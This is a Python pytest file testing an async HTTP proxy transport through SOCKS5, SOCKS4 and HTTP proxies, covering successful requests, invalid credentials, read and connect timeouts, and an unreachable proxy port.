@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.parametrize('rdns', (True, False))
@pytest.mark.asyncio
async def test_socks5_proxy_ipv4(url, rdns):
transport = AsyncProxyTransport.from_url(
SOCKS5_IPV4_URL,
rdns=rdns,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
@pytest.mark.asyncio
async def test_socks5_proxy_with_invalid_credentials(url=TEST_URL_IPV4):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=SOCKS5_PROXY_PORT,
username=LOGIN,
password=PASSWORD + '<PASSWORD>',
verify=create_ssl_context(url)
)
with pytest.raises(ProxyError):
await fetch(transport=transport, url=url)
@pytest.mark.asyncio
async def test_socks5_proxy_with_read_timeout(url=TEST_URL_IPV4_DELAY):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=SOCKS5_PROXY_PORT,
username=LOGIN,
password=PASSWORD,
verify=create_ssl_context(url)
)
timeout = httpx.Timeout(2, connect=32)
with pytest.raises(httpcore.ReadTimeout):
await fetch(transport=transport, url=url, timeout=timeout)
@pytest.mark.asyncio
async def test_socks5_proxy_with_connect_timeout(url=TEST_URL_IPV4):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=SOCKS5_PROXY_PORT,
username=LOGIN,
password=PASSWORD,
verify=create_ssl_context(url)
)
timeout = httpx.Timeout(32, connect=0.001)
with pytest.raises(ProxyTimeoutError):
await fetch(transport=transport, url=url, timeout=timeout)
@pytest.mark.asyncio
async def test_socks5_proxy_with_invalid_proxy_port(unused_tcp_port,
url=TEST_URL_IPV4):
transport = AsyncProxyTransport(
proxy_type=ProxyType.SOCKS5,
proxy_host=PROXY_HOST_IPV4,
proxy_port=unused_tcp_port,
username=LOGIN,
password=PASSWORD,
verify=create_ssl_context(url)
)
with pytest.raises(ProxyConnectionError):
await fetch(transport=transport, url=url)
@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.skipif(SKIP_IPV6_TESTS, reason="TravisCI doesn't support ipv6")
@pytest.mark.asyncio
async def test_socks5_proxy_ipv6(url):
transport = AsyncProxyTransport.from_url(
SOCKS5_IPV6_URL,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.parametrize('rdns', (True, False))
@pytest.mark.asyncio
async def test_socks4_proxy(url, rdns):
transport = AsyncProxyTransport.from_url(
SOCKS4_URL, rdns=rdns,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
@pytest.mark.parametrize('url', (TEST_URL_IPV4, TEST_URL_IPV4_HTTPS))
@pytest.mark.asyncio
async def test_http_proxy(url):
transport = AsyncProxyTransport.from_url(
HTTP_PROXY_URL,
verify=create_ssl_context(url)
)
res = await fetch(transport=transport, url=url)
assert res.status_code == 200
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.